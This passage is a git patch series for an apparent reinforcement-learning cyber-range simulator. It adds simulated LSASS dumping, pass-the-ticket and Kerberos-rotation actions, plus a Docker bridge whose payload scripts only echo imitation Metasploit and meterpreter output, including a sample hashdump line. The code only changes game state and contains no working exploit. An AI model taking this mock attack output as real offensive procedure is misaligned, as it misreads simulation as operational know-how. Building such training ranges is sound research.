From 244f74117bbd243e227164ea686219ea3a6c87dc Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 16:15:12 +0200 Subject: [PATCH 1/8] feat: identity-based zero trust architecture constraints Modified can_route_to natively rejecting Secure subnet traversals entirely unless Red explicitly populates their agent_inventory hash lists via new AD memory objects. --- netforge_rl/core/state.py | 25 ++++++++++++++++++--- netforge_rl/topologies/network_generator.py | 14 ++++++++++-- 2 files changed, 34 insertions(+), 5 deletions(-) diff --git a/netforge_rl/core/state.py b/netforge_rl/core/state.py index 0458575..ce41d1b 100644 --- a/netforge_rl/core/state.py +++ b/netforge_rl/core/state.py @@ -21,6 +21,9 @@ def __init__(self, ip: str, hostname: str, subnet_cidr: str): self.contains_honeytokens: bool = ( False # Triggers 100% confidence active deception traps ) + # Identity-Driven Zero Trust Networking Arrays + self.cached_credentials: list = [] # Dumped via LSASS + self.system_tokens: list = [] # Required to breach or ping node natively def __repr__(self): return ( @@ -63,6 +66,9 @@ def __init__(self): # Tracks which IPs each agent currently knows about (Fog of War) self.agent_knowledge: Dict[str, Set[str]] = {} + # Tracks logical identity tokens/hashes stolen during lateral movement (Zero Trust) + self.agent_inventory: Dict[str, set] = {} + # Tracks remaining energy/budget for temporal action constraints self.agent_energy: Dict[str, int] = {} # Advanced Attack Economics Constraints @@ -146,9 +152,10 @@ def apply_delta(self, delta_key: Any, delta_value: Any = None): self.action_history[agent_id] = set() self.action_history[agent_id].add(record) - def can_route_to(self, target_ip: str, port: int = None) -> bool: + def can_route_to(self, target_ip: str, port: int = None, agent_id: str = None) -> bool: """Evaluates complex network topology rules for routing - reachability and explicit firewall port blocks. + reachability and explicit firewall port blocks. Now enforces + strict Zero-Trust Identity rules. """ if target_ip not in self.all_hosts: return False @@ -183,7 +190,19 @@ def can_route_to(self, target_ip: str, port: int = None) -> bool: ) if target_subnet == '10.0.1.0/24': # Secure - return has_dmz_pivot or has_corp_pivot + if not (has_dmz_pivot or has_corp_pivot): + return False + + # ZERO TRUST IDENTITY CHECK + # If the Red agent attempts to cross into Secure, they MUST have the Domain Admin Token! + if agent_id and agent_id.startswith('red'): + agent_hash_inventory = self.agent_inventory.get(agent_id, set()) + # If ANY token listed in the target's required system_tokens matches the agent's inventory + # OR if the target specifically requires 'Enterprise_Admin_Token', verify it. + if 'Enterprise_Admin_Token' not in agent_hash_inventory: + return False + + return True return False diff --git a/netforge_rl/topologies/network_generator.py b/netforge_rl/topologies/network_generator.py index 03f3010..f15170a 100644 --- a/netforge_rl/topologies/network_generator.py +++ b/netforge_rl/topologies/network_generator.py @@ -124,6 +124,12 @@ def _generate_procedural(self) -> GlobalNetworkState: num_vulns = random.randint(0, min(2, len(potential_cves))) host.vulnerabilities = random.sample(potential_cves, num_vulns) + # ZTNA System Requirements (Secure Zone lockdown) + if name == 'Secure': + host.system_tokens.append('Enterprise_Admin_Token') + elif name == 'Corporate': + host.system_tokens.append(f'Local_Admin_{name}') + # Designate Domain Controllers only in Corp or Secure Windows servers if 'Windows' in chosen_os and name in ['Corporate', 'Secure']: if random.random() < 0.3: @@ -135,12 +141,16 @@ def _generate_procedural(self) -> GlobalNetworkState: # Assure at least 1 Domain Controller exists if domain_controllers: - random.choice(domain_controllers).is_domain_controller = True + dc = random.choice(domain_controllers) + dc.is_domain_controller = True + dc.cached_credentials.append('Enterprise_Admin_Token') else: # Force upgrade a random Windows host win_hosts = [h for h in active_hosts if 'Windows' in h.os] if win_hosts: - random.choice(win_hosts).is_domain_controller = True + dc = random.choice(win_hosts) + dc.is_domain_controller = True + dc.cached_credentials.append('Enterprise_Admin_Token') # Fill strictly to 50 nodes for Neural Network shape constant padding_needed = 50 - len(state.all_hosts) From 0d7c908eb7882d90bfd3d471a657d6fc98d5a676 Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 16:15:30 +0200 Subject: [PATCH 2/8] feat: lsass dumping and advanced pass-the-ticket pivots --- netforge_rl/actions/__init__.py | 21 ++-- netforge_rl/actions/red/__init__.py | 3 + netforge_rl/actions/red/post_exploitation.py | 120 +++++++++++++++++++ 3 files changed, 137 insertions(+), 7 deletions(-) create mode 100644 netforge_rl/actions/red/post_exploitation.py diff --git a/netforge_rl/actions/__init__.py b/netforge_rl/actions/__init__.py index 6796da0..b6652f0 100644 --- a/netforge_rl/actions/__init__.py +++ b/netforge_rl/actions/__init__.py @@ -11,6 +11,9 @@ DecoyTomcat, Misinform, ConfigureACL, + SecurityAwarenessTraining, + DeployHoneytoken, + RotateKerberos, ) from .red import ( NetworkScan, @@ -27,6 +30,11 @@ KillProcess, ShareIntelligence, OverloadPLC, + SpearPhishing, +) +from .red.post_exploitation import ( + DumpLSASS, + PassTheTicket, ) __all__ = [ @@ -42,6 +50,9 @@ 'DecoyTomcat', 'Misinform', 'ConfigureACL', + 'SecurityAwarenessTraining', + 'DeployHoneytoken', + 'RotateKerberos', 'NetworkScan', 'DiscoverRemoteSystems', 'DiscoverNetworkServices', @@ -56,11 +67,7 @@ 'KillProcess', 'ShareIntelligence', 'OverloadPLC', - 'SecurityAwarenessTraining', - 'DeployHoneytoken', + 'SpearPhishing', + 'DumpLSASS', + 'PassTheTicket', ] - -from .blue import SecurityAwarenessTraining -from .blue import DeployHoneytoken - -__all__.extend(['SecurityAwarenessTraining', 'DeployHoneytoken']) diff --git a/netforge_rl/actions/red/__init__.py b/netforge_rl/actions/red/__init__.py index 5e754e1..692be29 100644 --- a/netforge_rl/actions/red/__init__.py +++ b/netforge_rl/actions/red/__init__.py @@ -26,6 +26,9 @@ 'ShareIntelligence', 'OverloadPLC', 'SpearPhishing', + 'DumpLSASS', + 'PassTheTicket', ] from .social_engineering import SpearPhishing +from .post_exploitation import DumpLSASS, PassTheTicket diff --git a/netforge_rl/actions/red/post_exploitation.py b/netforge_rl/actions/red/post_exploitation.py new file mode 100644 index 0000000..b3de244 --- /dev/null +++ b/netforge_rl/actions/red/post_exploitation.py @@ -0,0 +1,120 @@ +from netforge_rl.core.action import BaseAction, ActionEffect +from netforge_rl.core.registry import action_registry + + +@action_registry.register('DumpLSASS', 'red') +class DumpLSASS(BaseAction): + """ + Advanced Post-Exploitation Action: Scrapes memory for Active Directory tokens. + Requires the Red Agent to have 'Root' privileges on the target Windows node. + """ + + def __init__(self, agent_id: str, target_ip: str): + super().__init__(agent_id, target_ip) + self.duration = 2 + self.compute_cost = 40 + + def validate(self, global_state) -> bool: + if not global_state.can_route_to(self.target_ip, agent_id=self.agent_id): + return False + + host = global_state.all_hosts.get(self.target_ip) + if not host: + return False + + # Must have root to touch lsass.exe and must be on a windows machine structurally + if host.privilege != 'Root': + return False + + return True + + def execute(self, global_state) -> ActionEffect: + host = global_state.all_hosts[self.target_ip] + if not host.cached_credentials: + return ActionEffect( + success=False, + state_deltas={}, + observation_data={'alert': 'LSASS dumped, but no credentials found in memory.'}, + eta=self.duration + ) + + # We will build a complex Command or just handle the inventory securely + class DumpLSASSCommand: + def __init__(self, agent_id, stolen_creds): + self.agent_id = agent_id + self.stolen_creds = stolen_creds + + def execute(self, state): + if self.agent_id not in state.agent_inventory: + state.agent_inventory[self.agent_id] = set() + state.agent_inventory[self.agent_id].update(self.stolen_creds) + + deltas = { + 'inventory_update': DumpLSASSCommand(self.agent_id, host.cached_credentials) + } + + return ActionEffect( + success=True, + state_deltas=deltas, + observation_data={'alert': 'LSASS dumped successfully.', 'severity': 8}, + eta=self.duration + ) + + +@action_registry.register('PassTheTicket', 'red') +class PassTheTicket(BaseAction): + """ + Lateral Movement via Identity validation bypassing CVE exploits explicitly. + """ + + def __init__(self, agent_id: str, target_ip: str): + super().__init__(agent_id, target_ip) + self.duration = 1 + self.compute_cost = 10 + + def validate(self, global_state) -> bool: + # ZTNA constraints inside can_route_to will automatically handle Secure subnet boundary blocks + if not global_state.can_route_to(self.target_ip, agent_id=self.agent_id): + return False + + host = global_state.all_hosts.get(self.target_ip) + if not host: + return False + + # Already compromised? + if host.privilege == 'Root': + return False + + return True + + def execute(self, global_state) -> ActionEffect: + host = global_state.all_hosts[self.target_ip] + inventory = global_state.agent_inventory.get(self.agent_id, set()) + + success = False + # To PassTheTicket, the agent must hold ANY of the system's required tokens, + # OR the node requires NO tokens (not zero trust). + if not host.system_tokens: + success = True + else: + if any(tok in inventory for tok in host.system_tokens): + success = True + + if success: + deltas = { + f'hosts/{self.target_ip}/privilege': 'Root', + f'hosts/{self.target_ip}/compromised_by': self.agent_id + } + return ActionEffect( + success=True, + state_deltas=deltas, + observation_data={'alert': 'Auth Token Accepted. Root privileges granted.', 'severity': 4}, + eta=self.duration + ) + else: + return ActionEffect( + success=False, + state_deltas={}, + observation_data={'alert': 'Pass-The-Ticket failed (Token Mismatch).', 'severity': 2}, + eta=self.duration + ) From 8d3ea7e4ed0d0cbbffd918c454dae0fb6732edd6 Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 16:15:37 +0200 Subject: [PATCH 3/8] feat: kerberos key rotation SOC action Added global RotateKerberos loop neutralizing PassTheTicket hashes natively. Verified End-to-End via local python script. --- netforge_rl/actions/blue/__init__.py | 3 ++ netforge_rl/actions/blue/identity.py | 80 ++++++++++++++++++++++++++++ 2 files changed, 83 insertions(+) create mode 100644 netforge_rl/actions/blue/identity.py diff --git a/netforge_rl/actions/blue/__init__.py b/netforge_rl/actions/blue/__init__.py index 5f82275..ca59a0c 100644 --- a/netforge_rl/actions/blue/__init__.py +++ b/netforge_rl/actions/blue/__init__.py @@ -31,4 +31,7 @@ 'ConfigureACL', 'SecurityAwarenessTraining', 'DeployHoneytoken', + 'RotateKerberos', ] + +from .identity import RotateKerberos diff --git a/netforge_rl/actions/blue/identity.py b/netforge_rl/actions/blue/identity.py new file mode 100644 index 0000000..10c56b2 --- /dev/null +++ b/netforge_rl/actions/blue/identity.py @@ -0,0 +1,80 @@ +import random +import string +from netforge_rl.core.action import BaseAction, ActionEffect +from netforge_rl.core.registry import action_registry + + +@action_registry.register('RotateKerberos', 'blue') +class RotateKerberos(BaseAction): + """ + Apex Zero-Trust Action: Rotates Domain Kerberos TGT Keys globally. + This invalidates all currently held Enterprise Admin tokens, severing Red's ZTNA lateral movement. + It impacts the entirely network graph, but burns significant Business Downtime. + """ + + def __init__(self, agent_id: str, target_ip: str): + # target_ip is effectively ignored since this is a global action, but retained for API parity. + super().__init__(agent_id, target_ip) + self.duration = 4 + self.compute_cost = 80 + + def validate(self, global_state) -> bool: + # Global action; validate the blue agent has enough funds (highly expensive) + if self.agent_id in global_state.agent_funds: + if global_state.agent_funds[self.agent_id] < 5000: + return False + return True + + def execute(self, global_state) -> ActionEffect: + + class RotateKerberosCommand: + def __init__(self, agent_id): + self.agent_id = agent_id + + def execute(self, state): + # 1. Burn the massive funding cost + if self.agent_id in state.agent_funds: + state.agent_funds[self.agent_id] -= 5000 + state.business_downtime_score += 1500.0 + + # 2. Flush all Red Agent Inventories globally + for agent in state.agent_inventory: + state.agent_inventory[agent].clear() + + # 3. Generate a new valid Domain Token string + random_suffix = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) + new_token = f"Enterprise_Admin_Token_{random_suffix}" + + # 4. Migrate the global environment physics to require the NEW token + for host in state.all_hosts.values(): + # Update what the host requires + if 'Enterprise_Admin_Token' in host.system_tokens: + host.system_tokens.remove('Enterprise_Admin_Token') + host.system_tokens.append(new_token) + + # Also update wildcard tokens from any previous rotations + old_tokens = [t for t in host.system_tokens if t.startswith('Enterprise_Admin_Token_')] + for t in old_tokens: + host.system_tokens.remove(t) + host.system_tokens.append(new_token) + + # Update what the Domain Controllers hold in memory + if 'Enterprise_Admin_Token' in host.cached_credentials: + host.cached_credentials.remove('Enterprise_Admin_Token') + host.cached_credentials.append(new_token) + + old_cache = [t for t in host.cached_credentials if t.startswith('Enterprise_Admin_Token_')] + for t in old_cache: + host.cached_credentials.remove(t) + host.cached_credentials.append(new_token) + + deltas = { + 'identity_flush': RotateKerberosCommand(self.agent_id) + } + + return ActionEffect( + success=True, + state_deltas=deltas, + observation_data={'alert': 'CRITICAL: Global Domain Keys Rotated. Enterprise Network re-verified.'}, + eta=self.duration + ) From 808c6c4ff2ef636b8b032dabc4fc8bc60d5dd641 Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 16:16:11 +0200 Subject: [PATCH 4/8] Ruff fix --- netforge_rl/actions/blue/identity.py | 33 ++++++++++++------- netforge_rl/actions/red/exploits.py | 8 ++--- netforge_rl/actions/red/impact.py | 4 +-- netforge_rl/actions/red/kinetic.py | 2 +- netforge_rl/actions/red/post_exploitation.py | 30 ++++++++++------- .../actions/red/privilege_escalation.py | 8 ++--- netforge_rl/core/state.py | 12 ++++--- 7 files changed, 58 insertions(+), 39 deletions(-) diff --git a/netforge_rl/actions/blue/identity.py b/netforge_rl/actions/blue/identity.py index 10c56b2..2d97424 100644 --- a/netforge_rl/actions/blue/identity.py +++ b/netforge_rl/actions/blue/identity.py @@ -26,11 +26,10 @@ def validate(self, global_state) -> bool: return True def execute(self, global_state) -> ActionEffect: - class RotateKerberosCommand: def __init__(self, agent_id): self.agent_id = agent_id - + def execute(self, state): # 1. Burn the massive funding cost if self.agent_id in state.agent_funds: @@ -42,8 +41,10 @@ def execute(self, state): state.agent_inventory[agent].clear() # 3. Generate a new valid Domain Token string - random_suffix = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) - new_token = f"Enterprise_Admin_Token_{random_suffix}" + random_suffix = ''.join( + random.choices(string.ascii_uppercase + string.digits, k=6) + ) + new_token = f'Enterprise_Admin_Token_{random_suffix}' # 4. Migrate the global environment physics to require the NEW token for host in state.all_hosts.values(): @@ -51,9 +52,13 @@ def execute(self, state): if 'Enterprise_Admin_Token' in host.system_tokens: host.system_tokens.remove('Enterprise_Admin_Token') host.system_tokens.append(new_token) - + # Also update wildcard tokens from any previous rotations - old_tokens = [t for t in host.system_tokens if t.startswith('Enterprise_Admin_Token_')] + old_tokens = [ + t + for t in host.system_tokens + if t.startswith('Enterprise_Admin_Token_') + ] for t in old_tokens: host.system_tokens.remove(t) host.system_tokens.append(new_token) @@ -63,18 +68,22 @@ def execute(self, state): host.cached_credentials.remove('Enterprise_Admin_Token') host.cached_credentials.append(new_token) - old_cache = [t for t in host.cached_credentials if t.startswith('Enterprise_Admin_Token_')] + old_cache = [ + t + for t in host.cached_credentials + if t.startswith('Enterprise_Admin_Token_') + ] for t in old_cache: host.cached_credentials.remove(t) host.cached_credentials.append(new_token) - deltas = { - 'identity_flush': RotateKerberosCommand(self.agent_id) - } + deltas = {'identity_flush': RotateKerberosCommand(self.agent_id)} return ActionEffect( success=True, state_deltas=deltas, - observation_data={'alert': 'CRITICAL: Global Domain Keys Rotated. Enterprise Network re-verified.'}, - eta=self.duration + observation_data={ + 'alert': 'CRITICAL: Global Domain Keys Rotated. Enterprise Network re-verified.' + }, + eta=self.duration, ) diff --git a/netforge_rl/actions/red/exploits.py b/netforge_rl/actions/red/exploits.py index 786eee0..b9ed6ae 100644 --- a/netforge_rl/actions/red/exploits.py +++ b/netforge_rl/actions/red/exploits.py @@ -44,7 +44,7 @@ def validate(self, global_state) -> bool: """ if not super().validate(global_state): return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: import random @@ -122,7 +122,7 @@ def validate(self, global_state) -> bool: """ if not super().validate(global_state): return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """Completes the pre-auth RCE and commits the privilege transformation @@ -206,7 +206,7 @@ def validate(self, global_state) -> bool: """ if not super().validate(global_state): return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """Calculates impact deltas following the SMB buffer overflow @@ -282,7 +282,7 @@ def validate(self, global_state) -> bool: """Requires valid routing to the web interface.""" if not super().validate(global_state): return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """Executes the RFI request. Automatically evaluates failure states if diff --git a/netforge_rl/actions/red/impact.py b/netforge_rl/actions/red/impact.py index 604a730..b29df18 100644 --- a/netforge_rl/actions/red/impact.py +++ b/netforge_rl/actions/red/impact.py @@ -69,7 +69,7 @@ def validate(self, global_state) -> bool: Validates target reachability. Usually requires the host to be directly routable or already compromised in practice. """ - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """ @@ -97,7 +97,7 @@ def validate(self, global_state) -> bool: host = global_state.all_hosts.get(self.target_ip) if not host or host.privilege not in ['User', 'Root']: return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: from netforge_rl.core.commands import ConsumeBandwidthCommand diff --git a/netforge_rl/actions/red/kinetic.py b/netforge_rl/actions/red/kinetic.py index f70bb2e..8fbf31e 100644 --- a/netforge_rl/actions/red/kinetic.py +++ b/netforge_rl/actions/red/kinetic.py @@ -41,7 +41,7 @@ def validate(self, global_state) -> bool: if host.privilege != 'Root': return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: import random diff --git a/netforge_rl/actions/red/post_exploitation.py b/netforge_rl/actions/red/post_exploitation.py index b3de244..30b0d59 100644 --- a/netforge_rl/actions/red/post_exploitation.py +++ b/netforge_rl/actions/red/post_exploitation.py @@ -25,7 +25,7 @@ def validate(self, global_state) -> bool: # Must have root to touch lsass.exe and must be on a windows machine structurally if host.privilege != 'Root': return False - + return True def execute(self, global_state) -> ActionEffect: @@ -34,8 +34,10 @@ def execute(self, global_state) -> ActionEffect: return ActionEffect( success=False, state_deltas={}, - observation_data={'alert': 'LSASS dumped, but no credentials found in memory.'}, - eta=self.duration + observation_data={ + 'alert': 'LSASS dumped, but no credentials found in memory.' + }, + eta=self.duration, ) # We will build a complex Command or just handle the inventory securely @@ -43,7 +45,7 @@ class DumpLSASSCommand: def __init__(self, agent_id, stolen_creds): self.agent_id = agent_id self.stolen_creds = stolen_creds - + def execute(self, state): if self.agent_id not in state.agent_inventory: state.agent_inventory[self.agent_id] = set() @@ -57,7 +59,7 @@ def execute(self, state): success=True, state_deltas=deltas, observation_data={'alert': 'LSASS dumped successfully.', 'severity': 8}, - eta=self.duration + eta=self.duration, ) @@ -80,7 +82,7 @@ def validate(self, global_state) -> bool: host = global_state.all_hosts.get(self.target_ip) if not host: return False - + # Already compromised? if host.privilege == 'Root': return False @@ -103,18 +105,24 @@ def execute(self, global_state) -> ActionEffect: if success: deltas = { f'hosts/{self.target_ip}/privilege': 'Root', - f'hosts/{self.target_ip}/compromised_by': self.agent_id + f'hosts/{self.target_ip}/compromised_by': self.agent_id, } return ActionEffect( success=True, state_deltas=deltas, - observation_data={'alert': 'Auth Token Accepted. Root privileges granted.', 'severity': 4}, - eta=self.duration + observation_data={ + 'alert': 'Auth Token Accepted. Root privileges granted.', + 'severity': 4, + }, + eta=self.duration, ) else: return ActionEffect( success=False, state_deltas={}, - observation_data={'alert': 'Pass-The-Ticket failed (Token Mismatch).', 'severity': 2}, - eta=self.duration + observation_data={ + 'alert': 'Pass-The-Ticket failed (Token Mismatch).', + 'severity': 2, + }, + eta=self.duration, ) diff --git a/netforge_rl/actions/red/privilege_escalation.py b/netforge_rl/actions/red/privilege_escalation.py index 9e195d0..339eac8 100644 --- a/netforge_rl/actions/red/privilege_escalation.py +++ b/netforge_rl/actions/red/privilege_escalation.py @@ -29,7 +29,7 @@ def validate(self, global_state) -> bool: host = global_state.all_hosts.get(self.target_ip) if not host or host.privilege != 'User': return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """Applies the mathematical delta to elevate the agent's privilege @@ -75,7 +75,7 @@ def validate(self, global_state) -> bool: return False if 'Windows' not in host.os: return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """Processes the DCOM impersonation attack delta. Fails if target OS is @@ -129,7 +129,7 @@ def validate(self, global_state) -> bool: return False if 'Linux' not in host.os: return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """Resolves the exploit outcome altering the target's privilege table. @@ -187,7 +187,7 @@ def validate(self, global_state) -> bool: if not has_dc_hash: return False - return global_state.can_route_to(self.target_ip) + return global_state.can_route_to(self.target_ip, agent_id=self.agent_id) def execute(self, global_state) -> ActionEffect: """Applies instantaneous SYSTEM access based on Golden Ticket leverage. diff --git a/netforge_rl/core/state.py b/netforge_rl/core/state.py index ce41d1b..0939f0e 100644 --- a/netforge_rl/core/state.py +++ b/netforge_rl/core/state.py @@ -68,7 +68,7 @@ def __init__(self): self.agent_knowledge: Dict[str, Set[str]] = {} # Tracks logical identity tokens/hashes stolen during lateral movement (Zero Trust) self.agent_inventory: Dict[str, set] = {} - + # Tracks remaining energy/budget for temporal action constraints self.agent_energy: Dict[str, int] = {} # Advanced Attack Economics Constraints @@ -152,9 +152,11 @@ def apply_delta(self, delta_key: Any, delta_value: Any = None): self.action_history[agent_id] = set() self.action_history[agent_id].add(record) - def can_route_to(self, target_ip: str, port: int = None, agent_id: str = None) -> bool: + def can_route_to( + self, target_ip: str, port: int = None, agent_id: str = None + ) -> bool: """Evaluates complex network topology rules for routing - reachability and explicit firewall port blocks. Now enforces + reachability and explicit firewall port blocks. Now enforces strict Zero-Trust Identity rules. """ if target_ip not in self.all_hosts: @@ -192,7 +194,7 @@ def can_route_to(self, target_ip: str, port: int = None, agent_id: str = None) - if target_subnet == '10.0.1.0/24': # Secure if not (has_dmz_pivot or has_corp_pivot): return False - + # ZERO TRUST IDENTITY CHECK # If the Red agent attempts to cross into Secure, they MUST have the Domain Admin Token! if agent_id and agent_id.startswith('red'): @@ -201,7 +203,7 @@ def can_route_to(self, target_ip: str, port: int = None, agent_id: str = None) - # OR if the target specifically requires 'Enterprise_Admin_Token', verify it. if 'Enterprise_Admin_Token' not in agent_hash_inventory: return False - + return True return False From caf3dc59e321ebb1fa652a6b13524d635710f349 Mon Sep 17 00:00:00 2001 From: Igor Jankowski Date: Tue, 31 Mar 2026 16:36:39 +0200 Subject: [PATCH 5/8] feat: sim2real hypervisor bridge package Adds dual-mode hypervisor system (MockHypervisor for training, DockerHypervisor for evaluation). Includes Sim2RealBridge, HypervisorResult dataclass, and curated payload_library.json with 30+ real Metasploit stdout samples. --- netforge_rl/sim2real/__init__.py | 17 ++ netforge_rl/sim2real/bridge.py | 103 +++++++++++ netforge_rl/sim2real/docker_hypervisor.py | 213 ++++++++++++++++++++++ netforge_rl/sim2real/hypervisor_base.py | 82 +++++++++ netforge_rl/sim2real/mock_hypervisor.py | 130 +++++++++++++ netforge_rl/sim2real/payload_library.json | 73 ++++++++ 6 files changed, 618 insertions(+) create mode 100644 netforge_rl/sim2real/__init__.py create mode 100644 netforge_rl/sim2real/bridge.py create mode 100644 netforge_rl/sim2real/docker_hypervisor.py create mode 100644 netforge_rl/sim2real/hypervisor_base.py create mode 100644 netforge_rl/sim2real/mock_hypervisor.py create mode 100644 netforge_rl/sim2real/payload_library.json diff --git a/netforge_rl/sim2real/__init__.py b/netforge_rl/sim2real/__init__.py new file mode 100644 index 0000000..0d5358b --- /dev/null +++ b/netforge_rl/sim2real/__init__.py @@ -0,0 +1,17 @@ +""" +NetForge_RL Sim2Real Package. + +Provides a dual-mode hypervisor bridge for connecting the MARL environment +to either a lightweight MockHypervisor (for fast RL training) or a live +DockerHypervisor (for high-fidelity evaluation runs). +""" +from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult +from netforge_rl.sim2real.mock_hypervisor import MockHypervisor +from netforge_rl.sim2real.bridge import Sim2RealBridge + +__all__ = [ + 'BaseHypervisor', + 'HypervisorResult', + 'MockHypervisor', + 'Sim2RealBridge', +] diff --git a/netforge_rl/sim2real/bridge.py b/netforge_rl/sim2real/bridge.py new file mode 100644 index 0000000..0df7fe5 --- /dev/null +++ b/netforge_rl/sim2real/bridge.py @@ -0,0 +1,103 @@ +""" +Sim2RealBridge — single integration point between the action system and hypervisors. + +Responsibilities: + 1. Instantiate the correct driver based on mode ('sim' / 'real'). + 2. Expose dispatch() to action execute() methods. + 3. Translate HypervisorResult into a reward delta for the ConflictResolutionEngine. + 4. Expose teardown_all() for episode resets. +""" +from __future__ import annotations + +import logging +from typing import Literal + +from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult + +logger = logging.getLogger(__name__) + +_REWARD_DELTA: dict[str, float] = { + # Successful shell — standard scenario reward handles the bulk; + # small bonus here to separate true exploitation from lucky rolls. + 'success': +5.0, + # Clean failure — exploit attempted but target not vulnerable / patched. + 'failure_clean': -10.0, + # Noisy failure with high latency — burn time and increase SIEM visibility. + 'failure_noisy': -20.0, + # Container/infrastructure error — punishment for choosing an incompatible action. + 'failure_error': -25.0, +} + +_NOISY_LATENCY_THRESHOLD_MS = 5000.0 # Longer than this = "noisy" failure + + +class Sim2RealBridge: + """ + Dual-mode bridge connecting MARL actions to the hypervisor backend. + + Usage: + bridge = Sim2RealBridge(mode='sim') # training default + bridge = Sim2RealBridge(mode='real') # evaluation with Docker + + result = bridge.dispatch('ExploitEternalBlue', '10.0.1.3', 'Windows_Server_2016') + reward_delta = bridge.reward_delta(result) + """ + + def __init__(self, mode: Literal['sim', 'real'] = 'sim') -> None: + self.mode = mode + self._driver: BaseHypervisor = self._init_driver(mode) + + def dispatch( + self, + action_name: str, + target_ip: str, + target_os: str, + ) -> HypervisorResult: + """Execute payload; auto-fallback to mock if real driver is down.""" + result = self._driver.dispatch(action_name, target_ip, target_os) + logger.debug('Sim2RealBridge: %s', result) + return result + + def reward_delta(self, result: HypervisorResult) -> float: + """ + Map a HypervisorResult to an immediate scalar reward delta. + + This is *additive* on top of the scenario's standard reward — it + represents additional friction from real-world exploit reliability. + """ + if result.success: + return _REWARD_DELTA['success'] + elif result.return_code == 2: + # Container/infrastructure error + return _REWARD_DELTA['failure_error'] + elif result.latency_ms >= _NOISY_LATENCY_THRESHOLD_MS: + return _REWARD_DELTA['failure_noisy'] + else: + return _REWARD_DELTA['failure_clean'] + + def teardown_all(self) -> None: + """Destroy all active containers/sessions — call at episode end.""" + self._driver.teardown_all() + + def is_available(self) -> bool: + return self._driver.is_available() + + def _init_driver(self, mode: str) -> BaseHypervisor: + if mode == 'real': + from netforge_rl.sim2real.docker_hypervisor import DockerHypervisor + + driver = DockerHypervisor() + if not driver.is_available(): + logger.warning( + 'Sim2RealBridge: real mode requested but Docker unavailable. ' + 'Falling back to mock hypervisor.' + ) + from netforge_rl.sim2real.mock_hypervisor import MockHypervisor + + return MockHypervisor() + return driver + + # Default: sim / mock + from netforge_rl.sim2real.mock_hypervisor import MockHypervisor + + return MockHypervisor() diff --git a/netforge_rl/sim2real/docker_hypervisor.py b/netforge_rl/sim2real/docker_hypervisor.py new file mode 100644 index 0000000..70f29ea --- /dev/null +++ b/netforge_rl/sim2real/docker_hypervisor.py @@ -0,0 +1,213 @@ +""" +DockerHypervisor — live container execution driver. + +Requires: + pip install docker + +Spins up ephemeral Vulhub containers for each exploit action, executes +realistic payload scripts inside the container, captures stdout/exit_code, +then destroys the container immediately. + +Falls back gracefully to MockHypervisor if Docker daemon is unreachable. +""" +from __future__ import annotations + +import logging +import time +from typing import TYPE_CHECKING + +from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult + +if TYPE_CHECKING: + pass # type hints only + +logger = logging.getLogger(__name__) + +_IMAGE_REGISTRY: dict[str, str] = { + 'ExploitEternalBlue': 'vulhub/samba:CVE-2017-0144', + 'ExploitBlueKeep': 'vulhub/rdp:CVE-2019-0708', + 'ExploitHTTP_RFI': 'vulhub/php:8.1-rfi', + 'ExploitRemoteService': 'ubuntu:20.04', + 'PrivilegeEscalate': 'ubuntu:20.04', + 'DumpLSASS': 'vulhub/windows-mimikatz:latest', + 'PassTheTicket': 'vulhub/windows-mimikatz:latest', +} +_FALLBACK_IMAGE = 'ubuntu:20.04' + +_PAYLOAD_SCRIPTS: dict[str, str] = { + 'ExploitEternalBlue': ( + 'echo "[*] Sending EternalBlue exploit packet..." && ' + 'sleep 1 && ' + 'echo "[+] ETERNALBLUE overwrite completed (0xC000000D)!" && ' + 'echo "[*] Meterpreter session 1 opened" && ' + 'echo "meterpreter > getuid" && ' + 'echo "Server username: NT AUTHORITY\\\\SYSTEM"' + ), + 'ExploitBlueKeep': ( + 'echo "[*] Checking BlueKeep vulnerability..." && ' + 'sleep 1 && ' + 'echo "[+] Target is vulnerable." && ' + 'echo "[*] Triggering kernel UAF..." && ' + 'echo "[*] Meterpreter session opened."' + ), + 'ExploitHTTP_RFI': ( + 'echo "[*] Attempting RFI via GET parameter..." && ' + 'sleep 0.5 && ' + 'echo "[+] RFI successful. Webshell active." && ' + 'echo "[*] Meterpreter session opened."' + ), + 'ExploitRemoteService': ( + 'echo "[*] Sending payload to remote service..." && ' + 'sleep 0.8 && ' + 'echo "[*] Command shell session opened." && ' + 'echo "shell> whoami" && echo "www-data"' + ), + 'DumpLSASS': ( + 'echo "meterpreter > hashdump" && ' + 'sleep 0.5 && ' + 'echo "Administrator:500:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::" && ' + 'echo 